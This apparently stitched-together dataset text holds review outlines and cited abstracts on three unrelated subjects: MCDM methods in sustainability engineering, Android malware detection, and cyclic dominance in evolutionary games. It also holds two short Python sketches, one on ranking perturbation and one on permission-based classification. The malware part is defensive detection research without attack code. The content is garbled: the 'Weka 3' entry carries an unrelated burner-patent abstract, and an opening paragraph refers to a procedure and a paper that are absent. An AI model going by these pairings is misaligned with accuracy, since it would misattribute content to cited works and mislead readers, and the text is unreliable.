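The perturbation procedure just described — repeatedly re-drawing the decision-matrix entries within a stated error and tallying which ranks each alternative attains — is easy to prototype. The sketch below is only illustrative: it assumes a simple weighted-sum (SAW) ranking, uniform relative noise and a made-up decision matrix, rather than the paper's eleven ranking methods and case-study data.

```python
import numpy as np

rng = np.random.default_rng(0)

def saw_ranks(X, w):
    """Simple additive weighting: max-normalise columns, return ranks (0 = best)."""
    scores = (w * X / X.max(axis=0)).sum(axis=1)
    return np.argsort(np.argsort(-scores))

def rank_statistics(X, w, rel_error=0.05, n_sim=10_000):
    """Estimate how often each alternative attains each rank when every
    matrix element is perturbed uniformly within +/- rel_error."""
    X = np.asarray(X, dtype=float)
    n_alt = X.shape[0]
    counts = np.zeros((n_alt, n_alt), dtype=int)  # counts[i, r]: alternative i got rank r
    for _ in range(n_sim):
        noise = rng.uniform(1 - rel_error, 1 + rel_error, size=X.shape)
        r = saw_ranks(X * noise, w)
        counts[np.arange(n_alt), r] += 1
    return counts / n_sim

# Hypothetical 4 alternatives x 3 benefit criteria (placeholder numbers).
X = [[7, 9, 6], [8, 7, 7], [6, 8, 9], [7, 8, 8]]
w = np.array([0.4, 0.35, 0.25])
probs = rank_statistics(X, w)
print(np.round(probs, 3))  # row i: probability of each rank for alternative i (column 0 = best)
```

Swapping saw_ranks for a TOPSIS or VIKOR implementation would reproduce the multi-method comparison the abstract refers to.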
Title: Application of MCDM Methods in Sustainability Engineering: A Literature Review 2008–2018
Section 1: Introduction
Description 1: Discuss the emergence of the concept of sustainability, the definition of sustainable development, and the role of sustainable engineering, highlighting the importance of multiple criteria decision making (MCDM) methods in this context.
Section 2: Primary Review Results
Description 2: Present the methodology used to collect and process the articles, the total number of MCDM articles found in various fields, and the trend of increasing publications in recent years.
Section 3: Detailed Review Results
Description 3: Provide an in-depth analysis and categorization of 108 collected articles into different areas like civil engineering, supply chains, transport and logistics, energy, and others. Each category should discuss the specific application of MCDM methods within these sectors.
Section 4: Civil Engineering and Infrastructure
Description 4: Detail the application of MCDM methods in civil engineering and infrastructure projects, including case studies and frameworks involving various methods and criteria.
Section 5: Supply Chain Management
Description 5: Analyze the use of MCDM methods in supply chain management, highlighting the challenges and solutions related to sustainable supplier selection and other supply chain aspects.
Section 6: Transport and Logistics
Description 6: Discuss the application of MCDM methods in transport and logistics, including the selection of sustainable transport plans, location of logistics centers, and alternative fuels.
Section 7: Energy
Description 7: Review the application of MCDM methods in the energy sector, focusing on the selection of renewable energy sources, location of energy facilities, and planning of energy production projects.
Section 8: Other Engineering Disciplines
Description 8: Cover the application of MCDM methods in various other engineering disciplines, addressing environmental management, smart housing sustainability, and other miscellaneous topics.
Section 9: Conclusions
Description 9: Summarize the findings, highlighting the significance of MCDM methods in achieving sustainability in engineering, the prevailing trends, and future directions for research in using MCDM methods to address complex engineering problems.
Android Malware Detection & Protection: A Survey
7
--- paper_title: A survey of mobile malware in the wild paper_content: Mobile malware is rapidly becoming a serious threat. In this paper, we survey the current state of mobile malware in the wild. We analyze the incentives behind 46 pieces of iOS, Android, and Symbian malware that spread in the wild from 2009 to 2011. We also use this data set to evaluate the effectiveness of techniques for preventing and identifying mobile malware. After observing that 4 pieces of malware use root exploits to mount sophisticated attacks on Android phones, we also examine the incentives that cause non-malicious smartphone tinkerers to publish root exploits and survey the availability of root exploits. --- paper_title: Dissecting Android Malware: Characterization and Evolution paper_content: The popularity and adoption of smart phones has greatly stimulated the spread of mobile malware, especially on the popular platforms such as Android. In light of their rapid growth, there is a pressing need to develop effective solutions. However, our defense capability is largely constrained by the limited understanding of these emerging mobile malware and the lack of timely access to related samples. In this paper, we focus on the Android platform and aim to systematize or characterize existing Android malware. Particularly, with more than one year effort, we have managed to collect more than 1,200 malware samples that cover the majority of existing Android malware families, ranging from their debut in August 2010 to recent ones in October 2011. In addition, we systematically characterize them from various aspects, including their installation methods, activation mechanisms as well as the nature of carried malicious payloads. The characterization and a subsequent evolution-based study of representative families reveal that they are evolving rapidly to circumvent the detection from existing mobile anti-virus software. Based on the evaluation with four representative mobile security software, our experiments show that the best case detects 79.6% of them while the worst case detects only 20.2% in our dataset. These results clearly call for the need to better develop next-generation anti-mobile-malware solutions. --- paper_title: Android malware attacks and countermeasures: Current and future directions paper_content: Smartphones are rising in popularity as well as becoming more sophisticated over recent years. This popularity coupled with the fact that smartphones contain a lot of private user data is causing a proportional rise in different malwares for the platform. In this paper we analyze and classify state-of-the-art malware techniques and their countermeasures. The paper also reports a novel method for malware development and novel attack techniques such as mobile botnets, usage pattern based attacks and repackaging attacks. The possible countermeasures are also proposed. Then a detailed analysis of one of the proposed novel malware methods is explained. Finally the paper concludes by summarizing the paper. --- paper_title: New Threats and Countermeasures in Digital Crime and Cyber Terrorism paper_content: Technological advances, although beneficial and progressive, can lead to vulnerabilities in system networks and security. 
While researchers attempt to find solutions, negative uses of technology continue to create new security threats to users. New Threats and Countermeasures in Digital Crime and Cyber Terrorism brings together research-based chapters and case studies on security techniques and current methods being used to identify and overcome technological vulnerabilities with an emphasis on security issues in mobile computing and online activities. This book is an essential reference source for researchers, university academics, computing professionals, and upper-level students interested in the techniques, laws, and training initiatives currently being implemented and adapted for secure computing. --- paper_title: Apposcopy: semantics-based detection of Android malware through static analysis paper_content: We present Apposcopy, a new semantics-based approach for identifying a prevalent class of Android malware that steals private user information. Apposcopy incorporates (i) a high-level language for specifying signatures that describe semantic characteristics of malware families and (ii) a static analysis for deciding if a given application matches a malware signature. The signature matching algorithm of Apposcopy uses a combination of static taint analysis and a new form of program representation called Inter-Component Call Graph to efficiently detect Android applications that have certain control- and data-flow properties. We have evaluated Apposcopy on a corpus of real-world Android applications and show that it can effectively and reliably pinpoint malicious applications that belong to certain malware families. --- paper_title: Droid Analytics: A Signature Based Analytic System to Collect, Extract, Analyze and Associate Android Malware paper_content: Smartphones and mobile devices are rapidly becoming indispensable devices for many users. Unfortunately, they also become fertile grounds for hackers to deploy malware. There is an urgent need to have a "security analytic & forensic system" which can facilitate analysts to examine, dissect, associate and correlate large number of mobile applications. An effective analytic system needs to address the following questions: How to automatically collect and manage a high volume of mobile malware? How to analyze a zero-day suspicious application, and compare or associate it with existing malware families in the database? How to reveal similar malicious logic in various malware, and to quickly identify the new malicious code segment? In this paper, we present the design and implementation of DroidAnalytics, a signature based analytic system to automatically collect, manage, analyze and extract android malware. The system facilitates analysts to retrieve, associate and reveal malicious logics at the "opcode level". We demonstrate the efficacy of DroidAnalytics using 150, 368 Android applications, and successfully determine 2, 475 Android malware from 102 different families, with 327 of them being zero-day malware samples from six different families. To the best of our knowledge, this is the first reported case in showing such a large Android malware analysis/detection. The evaluation shows the DroidAnalytics is a valuable tool and is effective in analyzing malware repackaging and mutations. 
--- paper_title: AndroSimilar: robust statistical feature signature for Android malware detection paper_content: Android Smartphone popularity has increased malware threats forcing security researchers and AntiVirus (AV) industry to carve out smart methods to defend Smartphone against malicious apps. Robust signature based solutions to mitigate threats become necessary to protect the Smartphone and confidential user data. In this paper we present AndroSimilar, a robust approach which generates signature by extracting statistically improbable features, to detect malicious Android apps. Proposed method is effective against code obfuscation and repackaging, widely used techniques to evade AV signature and to propagate unseen variants of known malware. AndroSimilar is a syntactic foot-printing mechanism that finds regions of statistical similarity with known malware to detect those unknown, zero day samples. Syntactic file similarity of whole file is considered instead of just opcodes for faster detection compared to known fuzzy hashing approaches. Results demonstrate robust detection of variants of known malware families. Proposed approach can be refined to deploy as Smartphone AV. --- paper_title: Detecting Android Malware by Analyzing Manifest Files paper_content: The threat of Android malware has increased owing to the increasing popularity of smartphones. Once an Android smartphone is infected with malware, the user suffers from various damages, such as the theft of personal information stored in the smartphones, the unintentional sending of short messages to premium-rate numbers without the user's knowledge, and the ability for the infected smartphones to be remotely operated and used for other malicious attacks. However, there are currently insufficient defense mechanisms against Android malware. This study proposes a new method to detect Android malware. The new method analyzes only manifest files that are required in Android applications. It realizes a lightweight approach for detection, and its effectiveness is experimentally confirmed by employing real samples of Android malware. The result shows that the new method can effectively detect Android malware, even when the sample is unknown. --- paper_title: Weka 3-Data Mining with Open Source Machine Learning Software in Java paper_content: A burner includes a central burner duct for passing combustion gas therethrough and an outer annular duct for the passage of combustion air and coaxial to the central burner duct. The ducts open or join at an opening area, upstream of which are one or two areas where the combustion gas and air are combined or brought together and mixed. A disk-shaped mixing element is positioned within the opening area centrally thereof and downstream of the first combination area and adjacent the second combination area. The mixing element has extending therethrough substantially in the direction of flow, a ring of separate passages. --- paper_title: On lightweight mobile phone application certification paper_content: Users have begun downloading an increasingly large number of mobile phone applications in response to advancements in handsets and wireless networks. The increased number of applications results in a greater chance of installing Trojans and similar malware. In this paper, we propose the Kirin security service for Android, which performs lightweight certification of applications to mitigate malware at install time. 
Kirin certification uses security rules, which are templates designed to conservatively match undesirable properties in security configuration bundled with applications. We use a variant of security requirements engineering techniques to perform an in-depth security analysis of Android to produce a set of rules that match malware characteristics. In a sample of 311 of the most popular applications downloaded from the official Android Market, Kirin and our rules found 5 applications that implement dangerous functionality and therefore should be installed with extreme caution. Upon close inspection, another five applications asserted dangerous rights, but were within the scope of reasonable functional needs. These results indicate that security configuration bundled with Android applications provides practical means of detecting malware. --- paper_title: Towards Formal Analysis of the Permission-Based Security Model for Android paper_content: Since the source code of Android was released to the public, people have concerned about the security of the Android system. Whereas the insecurity of a system can be easily exaggerated even with few minor vulnerabilities, the security is not easily demonstrated. Formal methods have been favorably applied for the purpose of ensuring security in different contexts to attest whether the system meets the security goals or not by relying on mathematical proofs. In order to commence the security analysis of Android, we specify the permission mechanism for the system. We represent the system in terms of a state machine, elucidate the security needs, and show that the specified system is secure over the specified states and transitions. We expect that this work will provide the basis for assuring the security of the Android system. The specification and verification were carried out using the Coq proof assistant. --- paper_title: PUMA: Permission Usage to Detect Malware in Android paper_content: The presence of mobile devices has increased in our lives offering almost the same functionality as a personal computer. Android devices have appeared lately and, since then, the number of applications available for this operating system has increased exponentially. Google already has its Android Market where applications are offered and, as happens with every popular media, is prone to misuse. In fact, malware writers insert malicious applications into this market, but also among other alternative markets. Therefore, in this paper, we present PUMA, a new method for detecting malicious Android applications through machine-learning techniques by analysing the extracted permissions from the application itself. --- paper_title: Performance Evaluation on Permission-Based Detection for Android Malware paper_content: It is a straightforward idea to detect a harmful mobile application based on the permissions it requests. This study attempts to explore the possibility of detecting malicious applications in Android operating system based on permissions. Compare against previous researches, we collect a relative large number of benign and malicious applications (124,769 and 480, respectively) and conduct experiments based on the collected samples. In addition to the requested and the required permissions, we also extract several easy-to-retrieve features from application packages to help the detection of malicious applications. 
Four commonly used machine learning algorithms including AdaBoost, Naive Bayes, Decision Tree (C4.5), and Support Vector Machine are used to evaluate the performance. Experimental results show that a permission-based detector can detect more than 81% of malicious samples. However, due to its precision, we conclude that a permission-based mechanism can be used as a quick filter to identify malicious applications. It still requires a second pass to make a complete analysis of a reported malicious application. --- paper_title: DroidMat: Android Malware Detection through Manifest and API Calls Tracing paper_content: Recently, the threat of Android malware is spreading rapidly, especially those repackaged Android malware. Although understanding Android malware using dynamic analysis can provide a comprehensive view, it is still subjected to high cost in environment deployment and manual efforts in investigation. In this study, we propose a static feature-based mechanism to provide a static analysis paradigm for detecting the Android malware. The mechanism considers the static information including permissions, deployment of components, Intent messages passing and API calls for characterizing the Android applications' behavior. In order to recognize different intentions of Android malware, different kinds of clustering algorithms can be applied to enhance the malware modeling capability. Besides, we leverage the proposed mechanism and develop a system, called DroidMat. First, DroidMat extracts the information (e.g., requested permissions, Intent messages passing, etc.) from each application's manifest file, and regards components (Activity, Service, Receiver) as entry points drilling down for tracing API Calls related to permissions. Next, it applies the K-means algorithm to enhance the malware modeling capability. The number of clusters is decided by the Singular Value Decomposition (SVD) method on the low rank approximation. Finally, it uses the kNN algorithm to classify the application as benign or malicious. The experiment result shows that the recall rate of our approach is better than that of a well-known tool, Androguard, published in Black Hat 2011, which focuses on Android malware analysis. In addition, DroidMat is efficient since it takes only half the time of Androguard to predict 1738 apps as benign apps or Android malware. --- paper_title: Extending Android Security Enforcement with a Security Distance Model paper_content: Compared to the traditional operating system platforms, smart phone platforms have different infrastructures and security requirements. Therefore new corresponding security strategies are also required. In this paper we firstly analyze the Android applications' threats and existing security mechanisms' weaknesses. Then we present an extension of Android Security Enforcement with a Security Distance model, ASESD, to mitigate malware. The new scheme can be implemented in an Android phone and make applications safer. Our theoretical analyses and practical evaluations show ASESD to be more accurate and highly scalable. --- paper_title: A Study of Android Application Security paper_content: The fluidity of application markets complicates smartphone security. Although recent efforts have shed light on particular security issues, there remains little insight into broader security characteristics of smartphone applications. This paper seeks to better understand smartphone application security by studying 1,100 popular free Android applications. 
We introduce the ded decompiler, which recovers Android application source code directly from its installation image. We design and execute a horizontal study of smartphone applications based on static analysis of 21 million lines of recovered code. Our analysis uncovered pervasive use/misuse of personal/ phone identifiers, and deep penetration of advertising and analytics networks. However, we did not find evidence of malware or exploitable vulnerabilities in the studied applications. We conclude by considering the implications of these preliminary findings and offer directions for future analysis. --- paper_title: Detecting repackaged smartphone applications in third-party android marketplaces paper_content: Recent years have witnessed incredible popularity and adoption of smartphones and mobile devices, which is accompanied by large amount and wide variety of feature-rich smartphone applications. These smartphone applications (or apps), typically organized in different application marketplaces, can be conveniently browsed by mobile users and then simply clicked to install on a variety of mobile devices. In practice, besides the official marketplaces from platform vendors (e.g., Google and Apple), a number of third-party alternative marketplaces have also been created to host thousands of apps (e.g., to meet regional or localization needs). To maintain and foster a hygienic smartphone app ecosystem, there is a need for each third-party marketplace to offer quality apps to mobile users. In this paper, we perform a systematic study on six popular Android-based third-party marketplaces. Among them, we find a common "in-the-wild" practice of repackaging legitimate apps (from the official Android Market) and distributing repackaged ones via third-party marketplaces. To better understand the extent of such practice, we implement an app similarity measurement system called DroidMOSS that applies a fuzzy hashing technique to effectively localize and detect the changes from app-repackaging behavior. The experiments with DroidMOSS show a worrisome fact that 5% to 13% of apps hosted on these studied marketplaces are repackaged. Further manual investigation indicates that these repackaged apps are mainly used to replace existing in-app advertisements or embed new ones to "steal" or re-route ad revenues. We also identify a few cases with planted backdoors or malicious payloads among repackaged apps. The results call for the need of a rigorous vetting process for better regulation of third-party smartphone application marketplaces. --- paper_title: DroidAPIMiner: Mining API-Level Features for Robust Malware Detection in Android paper_content: The increasing popularity of Android apps makes them the target of malware authors. To defend against this severe increase of Android malwares and help users make a better evaluation of apps at install time, several approaches have been proposed. However, most of these solutions suffer from some shortcomings; computationally expensive, not general or not robust enough. In this paper, we aim to mitigate Android malware installation through providing robust and lightweight classifiers. We have conducted a thorough analysis to extract relevant features to malware behavior captured at API level, and evaluated different classifiers using the generated feature set. Our results show that we are able to achieve an accuracy as high as 99% and a false positive rate as low as 2.2% using KNN classifier. 
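PUMA, the permission-based evaluation above, DroidMat and DroidAPIMiner all share the same basic recipe: turn each app into a (mostly binary) feature vector of requested permissions and/or API calls, then train a standard classifier. A toy version of that pipeline is sketched below; the permission lists, labels and the choice of a random-forest classifier are illustrative placeholders, not the feature sets or models of any of the cited systems.

```python
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score

# Hypothetical training data: permissions requested by each app, plus a label
# (1 = malicious, 0 = benign). Real systems extract these from AndroidManifest.xml
# and, for API-level features, from the disassembled dex code.
apps = [
    ["INTERNET", "SEND_SMS", "READ_CONTACTS"],
    ["INTERNET", "ACCESS_FINE_LOCATION"],
    ["SEND_SMS", "RECEIVE_BOOT_COMPLETED", "READ_PHONE_STATE"],
    ["INTERNET"],
    ["INTERNET", "READ_PHONE_STATE", "SEND_SMS"],
    ["ACCESS_COARSE_LOCATION", "INTERNET"],
]
labels = [1, 0, 1, 0, 1, 0]

# One-hot encode the permission sets into a binary feature matrix.
encoder = MultiLabelBinarizer()
X = encoder.fit_transform(apps)

clf = RandomForestClassifier(n_estimators=100, random_state=0)
print(cross_val_score(clf, X, labels, cv=2))  # toy-sized cross-validation
```

A real deployment would obtain the permission list from the manifest (e.g. via a manifest parser or the aapt tool) and train on tens of thousands of labelled apps rather than six.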
--- paper_title: Formalisation and analysis of Dalvik bytecode paper_content: Abstract With the large, and rapidly increasing, number of smartphones based on the Android platform, combined with the open nature of the platform that allows “apps” to be downloaded and executed on the smartphone, misbehaving and malicious (malware) apps are set to become a serious problem. To counter this problem, automated tools for analysing and verifying apps are essential. Furthermore, to ensure high-fidelity of such tools, it is essential to formally specify both semantics and analyses. In this paper we present, to the best of our knowledge, the first formalisation of the complete Dalvik bytecode language including reflection features and the first formally specified control flow analysis for the language, including advanced control flow features such as dynamic dispatch, exceptions, and reflection. To determine which features to include in the formalisation and analysis, 1700 Android apps from the Google Play app market (formerly known as Android Market) were downloaded and examined. --- paper_title: Retargeting Android applications to Java bytecode paper_content: The Android OS has emerged as the leading platform for SmartPhone applications. However, because Android applications are compiled from Java source into platform-specific Dalvik bytecode, existing program analysis tools cannot be used to evaluate their behavior. This paper develops and evaluates algorithms for retargeting Android applications received from markets to Java class files. The resulting Dare tool uses a new intermediate representation to enable fast and accurate retargeting. Dare further applies strong constraint solving to infer typing information and translates the 257 DVM opcodes using only 9 translation rules. It also handles cases where the input Dalvik bytecode is unverifiable. We evaluate Dare on 1,100 of the top applications found in the free section of the Android market and successfully retarget 99.99% of the 262,110 associated classes. Further, whereas existing tools can only fully retarget about half of these applications, Dare can recover over 99% of them. In this way, we open the door to users, developers and markets to use the vast array of program analysis tools to ensure the correct operation of Android applications. --- paper_title: Dexpler: Converting Android Dalvik Bytecode to Jimple for Static Analysis with Soot paper_content: This paper introduces Dexpler, a software package which converts Dalvik bytecode to Jimple. Dexpler is built on top of Dedexer and Soot. As Jimple is Soot's main internal representation of code, the Dalvik bytecode can be manipulated with any Jimple based tool, for instance for performing point-to or flow analysis. --- paper_title: A survey on automated dynamic malware-analysis techniques and tools paper_content: Anti-virus vendors are confronted with a multitude of potentially malicious samples today. Receiving thousands of new samples every day is not uncommon. The signatures that detect confirmed malicious threats are mainly still created manually, so it is important to discriminate between samples that pose a new unknown threat and those that are mere variants of known malware. This survey article provides an overview of techniques based on dynamic analysis that are used to analyze potentially malicious samples. 
It also covers analysis programs that employ these techniques to assist human analysts in assessing, in a timely and appropriate manner, whether a given sample deserves closer manual inspection due to its unknown malicious behavior. --- paper_title: “Andromaly”: a behavioral malware detection framework for android devices paper_content: This article presents Andromaly--a framework for detecting malware on Android mobile devices. The proposed framework realizes a Host-based Malware Detection System that continuously monitors various features and events obtained from the mobile device and then applies Machine Learning anomaly detectors to classify the collected data as normal (benign) or abnormal (malicious). Since no malicious applications are yet available for Android, we developed four malicious applications, and evaluated Andromaly's ability to detect new malware based on samples of known malware. We evaluated several combinations of anomaly detection algorithms, feature selection method and the number of top features in order to find the combination that yields the best performance in detecting new malware on Android. Empirical results suggest that the proposed framework is effective in detecting malware on mobile devices in general and on Android in particular. --- paper_title: AntiMalDroid: An Efficient SVM-Based Malware Detection Framework for Android paper_content: Mobile handsets, especially smartphones, are becoming more open and general-purpose, thus they also become attack targets of malware. The threat of malicious software has become an important factor in the safety of smartphones. Android is the most popular open-source smartphone operating system and its permission declaration access control mechanisms can’t detect the behavior of malware. In this work, AntiMalDroid, a software behavior signature based malware detection framework using the SVM algorithm, is proposed; AntiMalDroid can detect malicious software and their variants effectively at runtime and extend the malware characteristics database dynamically. Experimental results show that the approach has a high detection rate and low rates of false positives and false negatives, and the power and performance impact on the original system can also be ignored. --- paper_title: Crowdroid: behavior-based malware detection system for Android paper_content: The sharp increase in the number of smartphones on the market, with the Android platform poised to become a market leader, makes the need for malware analysis on this platform an urgent issue. In this paper we capitalize on earlier approaches for dynamic analysis of application behavior as a means for detecting malware in the Android platform. The detector is embedded in an overall framework for collection of traces from an unlimited number of real users based on crowdsourcing. Our framework has been demonstrated by analyzing the data collected in the central server using two types of data sets: those from artificial malware created for test purposes, and those from real malware found in the wild. The method is shown to be an effective means of isolating the malware and alerting the users of a downloaded malware. This shows the potential for avoiding the spreading of a detected malware to a larger community. 
--- paper_title: TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones paper_content: Today's smartphone operating systems frequently fail to provide users with adequate control over and visibility into how third-party applications use their private data. We address these shortcomings with TaintDroid, an efficient, system-wide dynamic taint tracking and analysis system capable of simultaneously tracking multiple sources of sensitive data. TaintDroid provides realtime analysis by leveraging Android's virtualized execution environment. TaintDroid incurs only 14% performance overhead on a CPU-bound micro-benchmark and imposes negligible overhead on interactive third-party applications. Using TaintDroid to monitor the behavior of 30 popular third-party Android applications, we found 68 instances of potential misuse of users' private information across 20 applications. Monitoring sensitive data with TaintDroid provides informed use of third-party applications for phone users and valuable input for smartphone security service firms seeking to identify misbehaving applications. --- paper_title: DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android Malware Analysis paper_content: The prevalence of mobile platforms, the large market share of Android, plus the openness of the Android Market makes it a hot target for malware attacks. Once a malware sample has been identified, it is critical to quickly reveal its malicious intent and inner workings. In this paper we present DroidScope, an Android analysis platform that continues the tradition of virtualization-based malware analysis. Unlike current desktop malware analysis platforms, DroidScope reconstructs both the OS-level and Java-level semantics simultaneously and seamlessly. To facilitate custom analysis, DroidScope exports three tiered APIs that mirror the three levels of an Android device: hardware, OS and Dalvik Virtual Machine. On top of DroidScope, we further developed several analysis tools to collect detailed native and Dalvik instruction traces, profile API-level activity, and track information leakage through both the Java and native components using taint analysis. These tools have proven to be effective in analyzing real world malware samples and incur reasonably low performance overheads. --- paper_title: An Overview of Mobile Malware and Solutions paper_content: Mobile Security has been a rapidly growing field in the security area. With the increases of mobile devices and mobile applications, the need for mobile security has increased dramatically over the past several years. Many research and development projects on mobile security are ongoing in government, industry and academia. In this paper, we present an analysis of current mobile security problems and propose the possible solutions to malware threats. Our experiments show antimalware can protect mobile device from different types of mobile malware threats effectively. --- paper_title: An Android Application Sandbox system for suspicious software detection paper_content: Smartphones are steadily gaining popularity, creating new application areas as their capabilities increase in terms of computational power, sensors and communication. Emerging new features of mobile devices give opportunity to new threats. Android is one of the newer operating systems targeting smartphones. While being based on a Linux kernel, Android has unique properties and specific limitations due to its mobile nature. 
This makes it harder to detect and react upon malware attacks if using conventional techniques. In this paper, we propose an Android Application Sandbox (AASandbox) which is able to perform both static and dynamic analysis on Android programs to automatically detect suspicious applications. Static analysis scans the software for malicious patterns without installing it. Dynamic analysis executes the application in a fully isolated environment, i.e. sandbox, which intervenes and logs low-level interactions with the system for further analysis. Both the sandbox and the detection algorithms can be deployed in the cloud, providing a fast and distributed detection of suspicious software in a mobile software store akin to Google's Android Market. Additionally, AASandbox might be used to improve the efficiency of classical anti-virus applications available for the Android operating system. ---
Title: Android Malware Detection & Protection: A Survey
Section 1: INTRODUCTION
Description 1: Introduce the significance of Android OS, its popularity, and the rising threats from malware, emphasizing the necessity of robust malware detection and protection mechanisms.
Section 2: ANDROID MALWARE ANALYSIS
Description 2: Categorize and describe the various types of malware targeting Android devices, including Trojans, Backdoors, Worms, Spyware, Botnets, Ransomwares, and Riskwares.
Section 3: MALWARE PENETRATION TECHNIQUES
Description 3: Examine the different techniques used by attackers to penetrate Android devices, such as repackaging, drive-by downloads, dynamic payloads, and stealth malware techniques.
Section 4: MALWARE DETECTION APPROACHES
Description 4: Provide an analysis of the methods used for malware detection on Android, including both static and dynamic approaches, and evaluate their effectiveness and limitations.
Section 5: PERFORMANCE EVALUATION & ANALYSIS
Description 5: Assess the performance of various malware detection techniques, comparing static and dynamic approaches and discussing their respective advantages and limitations in depth.
Section 6: FUTURE TRENDS AND HYBRID SOLUTIONS
Description 6: Predict future trends in Android market shares and malware growth, and propose hybrid solutions combining static and dynamic analysis to provide better security mechanisms.
Section 7: CONCLUSION
Description 7: Summarize the findings of the survey, emphasizing the need for a hybrid solution for effective malware detection and outlining future work plans to develop and implement such solutions.
Cyclic dominance in evolutionary games: A review
13
--- paper_title: Resolving social dilemmas on evolving random networks paper_content: We show that strategy-independent adaptations of random interaction networks can induce powerful mechanisms, ranging from the Red Queen to group selection, which promote cooperation in evolutionary social dilemmas. These two mechanisms emerge spontaneously as dynamical processes due to deletions and additions of links, which are performed whenever players adopt new strategies and after a certain number of game iterations, respectively. The potency of cooperation promotion, as well as the mechanism responsible for it, can thereby be tuned via a single parameter determining the frequency of link additions. We thus demonstrate that coevolving random networks may evoke an appropriate mechanism for each social dilemma, such that cooperation prevails even in highly unfavorable conditions. --- paper_title: Rock–scissors–paper and the survival of the weakest paper_content: In the children's game of rock–scissors–paper, players each choose one of three strategies. A rock beats a pair of scissors, scissors beat a sheet of paper and paper beats a rock, so the strategies form a competitive cycle. Although cycles in competitive ability appear to be reasonably rare among terrestrial plants, they are common among marine sessile organisms and have been reported in other contexts. Here we consider a system with three species in a competitive loop and show that this simple ecology exhibits two counter-intuitive phenomena. First, the species that is least competitive is expected to have the largest population and, where there are oscillations in a finite population, to be the least likely to die out. As a consequence an apparent weakening of a species leads to an increase in its population. Second, evolution favours the most competitive individuals within a species, which leads to a decline in its population. This is analogous to the tragedy of the commons, but here, rather than leading to a collapse, the ‘tragedy’ acts to maintain diversity. --- paper_title: Chemical Warfare Among Invaders: A Detoxification Interaction Facilitates an Ant Invasion paper_content: As tawny crazy ants (Nylanderia fulva) invade the southern USA, they often displace imported fire ants (Solenopsis invicta). Following exposure to S. invicta venom, N. fulva applies abdominal exocrine gland secretions to its cuticle. Bioassays reveal that these secretions detoxify S. invicta venom. Further, formic acid, from N. fulva venom, is the detoxifying agent. N. fulva exhibits this detoxification behavior after conflict with a variety of ant species; however, it expresses it most intensely after interactions with S. invicta. This behavior may have evolved in their shared South American native range. The unique capacity to detoxify a major competitor’s venom likely contributes substantially to its ability to displace S. invicta populations, making this behavior a causative agent in the ecological transformation of regional arthropod assemblages. --- paper_title: Evolutionary conservation of species' roles in food webs. paper_content: Studies of ecological networks (the web of interactions between species in a community) demonstrate an intricate link between a community's structure and its long-term viability. It remains unclear, however, how much a community's persistence depends on the identities of the species present, or how much the role played by each species varies as a function of the community in which it is found. 
We measured species' roles by studying how species are embedded within the overall network and the subsequent dynamic implications. Using data from 32 empirical food webs, we find that species' roles and dynamic importance are inherent species attributes and can be extrapolated across communities on the basis of taxonomic classification alone. Our results illustrate the variability of roles across species and communities and the relative importance of distinct species groups when attempting to conserve ecological communities. --- paper_title: A synthetic oscillatory network of transcriptional regulators paper_content: Networks of interacting biomolecules carry out many essential functions in living cells, but the 'design principles' underlying the functioning of such intracellular networks remain poorly understood, despite intensive efforts including quantitative analysis of relatively simple systems. Here we present a complementary approach to this problem: the design and construction of a synthetic network to implement a particular function. We used three transcriptional repressor systems that are not part of any natural biological clock to build an oscillating network, termed the repressilator, in Escherichia coli. The network periodically induces the synthesis of green fluorescent protein as a readout of its state in individual cells. The resulting oscillations, with typical periods of hours, are slower than the cell-division cycle, so the state of the oscillator has to be transmitted from generation to generation. This artificial clock displays noisy behaviour, possibly because of stochastic fluctuations of its components. Such 'rational network design may lead both to the engineering of new cellular behaviours and to an improved understanding of naturally occurring networks. --- paper_title: Labyrinthine clustering in a spatial rock-paper-scissors ecosystem paper_content: The spatial rock-paper-scissors ecosystem, where three species interact cyclically, is a model example of how spatial structure can maintain biodiversity. We here consider such a system for a broad range of interaction rates. When one species grows very slowly, this species and its prey dominate the system by self-organizing into a labyrinthine configuration in which the third species propagates. The cluster size distributions of the two dominating species have heavy tails and the configuration is stabilized through a complex spatial feedback loop. We introduce a statistical measure that quantifies the amount of clustering in the spatial system by comparison with its mean-field approximation. Hereby, we are able to quantitatively explain how the labyrinthine configuration slows down the dynamics and stabilizes the system. --- paper_title: Evolutionary game theory: Temporal and spatial effects beyond replicator dynamics paper_content: Evolutionary game dynamics is one of the most fruitful frameworks for studying evolution in different disciplines, from Biology to Economics. Within this context, the approach of choice for many researchers is the so-called replicator equation, that describes mathematically the idea that those individuals performing better have more offspring and thus their frequency in the population grows. While very many interesting results have been obtained with this equation in the three decades elapsed since it was first proposed, it is important to realize the limits of its applicability. 
One particularly relevant issue in this respect is that of non-mean-field effects, that may arise from temporal fluctuations or from spatial correlations, both neglected in the replicator equation. This review discusses these temporal and spatial effects focusing on the non-trivial modifications they induce when compared to the outcome of replicator dynamics. Alongside this question, the hypothesis of linearity and its relation to the choice of the rule for strategy update is also analyzed. The discussion is presented in terms of the emergence of cooperation, as one of the current key problems in Biology and in other disciplines. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Zero-one survival behavior of cyclically competing species paper_content: The coexistence of competing species is, due to unavoidable fluctuations, always transient. In this Letter, we investigate the ultimate survival probabilities characterizing different species in cyclic competition. We show that they often obey a surprisingly simple, though nontrivial behavior. Within a model where coexistence is neutrally stable, we demonstrate a robust zero-one law: When the interactions between the three species are (generically) asymmetric, the "weakest" species survives at a probability that tends to one for large population sizes, while the other two are guaranteed to extinction. We rationalize our findings from stochastic simulations by an analytic approach. 